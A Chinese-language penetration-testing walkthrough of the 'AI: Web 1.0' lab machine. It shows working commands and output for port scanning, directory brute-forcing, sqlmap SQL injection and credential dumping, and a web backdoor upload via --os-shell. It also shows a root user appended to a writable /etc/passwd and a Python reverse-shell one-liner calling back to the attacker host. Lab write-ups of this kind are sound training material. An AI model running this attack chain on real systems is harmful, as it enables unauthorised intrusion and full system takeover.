发现+端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6c:40:99, IPv4: 192.168.2.8
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.2.1     00:50:56:c0:00:08       VMware, Inc.
192.168.2.2     00:50:56:e4:e9:e5       VMware, Inc.
192.168.2.5     00:0c:29:93:fe:b3       VMware, Inc.
192.168.2.254   00:50:56:e6:f5:e8       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 4 responded
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.2.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 03:18 EDT
Nmap scan report for 192.168.2.5
Host is up (0.00060s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
|_http-server-header: Apache
| http-robots.txt: 2 disallowed entries 
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-title: AI Web 1.0
MAC Address: 00:0C:29:93:FE:B3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms 192.168.2.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds

目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.2.5              
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_192.168.2.5/_24-09-05_03-19-22.txt

Target: http://192.168.2.5/

[03:19:22] Starting: 
[03:19:23] 403 -  220B  - /.ht_wsr.txt
[03:19:23] 403 -  223B  - /.htaccess.bak1
[03:19:23] 403 -  223B  - /.htaccess.orig
[03:19:23] 403 -  223B  - /.htaccess_orig
[03:19:23] 403 -  224B  - /.htaccess_extra
[03:19:23] 403 -  225B  - /.htaccess.sample
[03:19:23] 403 -  223B  - /.htaccess.save
[03:19:23] 403 -  221B  - /.htaccessOLD
[03:19:23] 403 -  221B  - /.htaccessBAK
[03:19:23] 403 -  222B  - /.htaccessOLD2
[03:19:23] 403 -  213B  - /.htm
[03:19:23] 403 -  214B  - /.html
[03:19:23] 403 -  223B  - /.htpasswd_test
[03:19:23] 403 -  220B  - /.httr-oauth
[03:19:23] 403 -  219B  - /.htpasswds
[03:19:24] 403 -  213B  - /.php
[03:19:24] 403 -  221B  - /.htaccess_sc
[03:19:40] 200 -   80B  - /robots.txt
[03:19:40] 403 -  222B  - /server-status
[03:19:40] 403 -  223B  - /server-status/

Task Completed

robots.txt

1
2
3
4
User-agent: *
Disallow: 
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/

image-20240905152753547

image-20240905152808888

image-20240905152914060

sql注入

1
sqlmap -r req.txt --batch -D aiweb1 -T systemUser -C id,password,userName --dump

image-20240905154948633

1
2
t00r
FakeUserPassw0rd
1
2
aiweb1pwn
MyEvilPass_f908sdaf9_sadfasf0sa
1
2
u3er
N0tThis0neAls0

dirb扫描出info文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kali)-[~/yiyi/tmp]
└─# dirb http://192.168.2.5/m3diNf0/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Sep  5 03:52:38 2024
URL_BASE: http://192.168.2.5/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.2.5/m3diNf0/ ----
+ http://192.168.2.5/m3diNf0/info.php (CODE:200|SIZE:84303)                                                                                                                        
                                                                                                                                                                                   
-----------------
END_TIME: Thu Sep  5 03:52:41 2024
DOWNLOADED: 4612 - FOUND: 1

image-20240905155311656

关键词root搜索绝对路径

1
/home/www/html/web1x443290o2sdf92213

image-20240905155340186

disable_functions

1
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,

根据网站绝对路径可以拼接路径上传shell

1
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──(root㉿kali)-[~/yiyi/tmp]
└─# sqlmap -r req.txt --os-shell

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.6.3#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:01:45 /2024-09-05/

[04:01:45] [INFO] parsing HTTP request from 'req.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] 

[04:01:46] [INFO] resuming back-end DBMS 'mysql' 
[04:01:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 8795=8795#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(4231=4231,1))),0x71706b7671),4231)-- LvwO&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 1312 FROM (SELECT(SLEEP(5)))sBBH)-- DdYi&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a6271,0x455143624b59675148644e666b6d786f66745057795551626e6643544a4f4c58776177534e6e697a,0x71706b7671)#&Operation=Submit
---
[04:01:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[04:01:46] [INFO] going to use a web backdoor for command prompt
[04:01:46] [INFO] fingerprinting the back-end DBMS operating system
[04:01:46] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] 

[04:01:51] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
[04:02:05] [WARNING] unable to automatically parse any web server path
[04:02:05] [INFO] trying to upload the file stager on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' via LIMIT 'LINES TERMINATED BY' method
[04:02:05] [INFO] the file stager has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.2.5:80/se3reTdir777/uploads/tmpuzwml.php
[04:02:05] [INFO] the backdoor has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.2.5:80/se3reTdir777/uploads/tmpbcmer.php
[04:02:05] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> 
1
2
[04:02:05] [INFO] the file stager has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.2.5:80/se3reTdir777/uploads/tmpuzwml.php
[04:02:05] [INFO] the backdoor has been successfully uploaded on '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/' - http://192.168.2.5:80/se3reTdir777/uploads/tmpbcmer.php

注意两个上传文件

一个是文件上传的文件,一个是命令执行的

image-20240905160522764

image-20240905160544810

提权

发现/etc/passwd具有读写权限

1
2
3
4
5
6
os-shell> ls -al /etc/|grep passwd
command standard output:
---
-rw-r--r--  1 www-data www-data   1664 Aug 21  2019 passwd
-rw-r--r--  1 www-data www-data   1617 Aug 20  2019 passwd-
---

写入新用户

创建登陆密码

1
2
3
┌──(root㉿kali)-[~]
└─# perl -le 'print crypt("123456","addedsalt")'
adrla7IBSfTZQ

写入

1
2
os-shell> echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
No output

image-20240905162655772

反弹shell

有nc但是-e被禁用了

有python,使用python反弹shell

1
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.2.8',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

image-20240905162919468

切换用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ python -c 'import pty;pty.spawn("/bin/bash")'
<oads$ python -c 'import pty;pty.spawn("/bin/bash")'                       
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$ su test
<web1x443290o2sdf92213/se3reTdir777/uploads$ su test                       
Password: 123456

root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# ls /root             
<eb1x443290o2sdf92213/se3reTdir777/uploads# ls /root                   
flag.txt
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# cat /root/flag
<3290o2sdf92213/se3reTdir777/uploads# cat /root/flag                   
cat: /root/flag: No such file or directory
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads# cat /root/flag.txt
<o2sdf92213/se3reTdir777/uploads# cat /root/flag.txt                   
####################################################
#                                                  #
#                AI: WEB 1.0                       #
#                                                  #
#              Congratulation!!!                   #
#                                                  #
#      Thank you for penetrate my system.          #
#                                                  #
#            Hope you enjoyed this.                #
#                                                  #
#                                                  #
#  flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71}  #
#                                                  #
####################################################
root@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads#

image-20240905163202312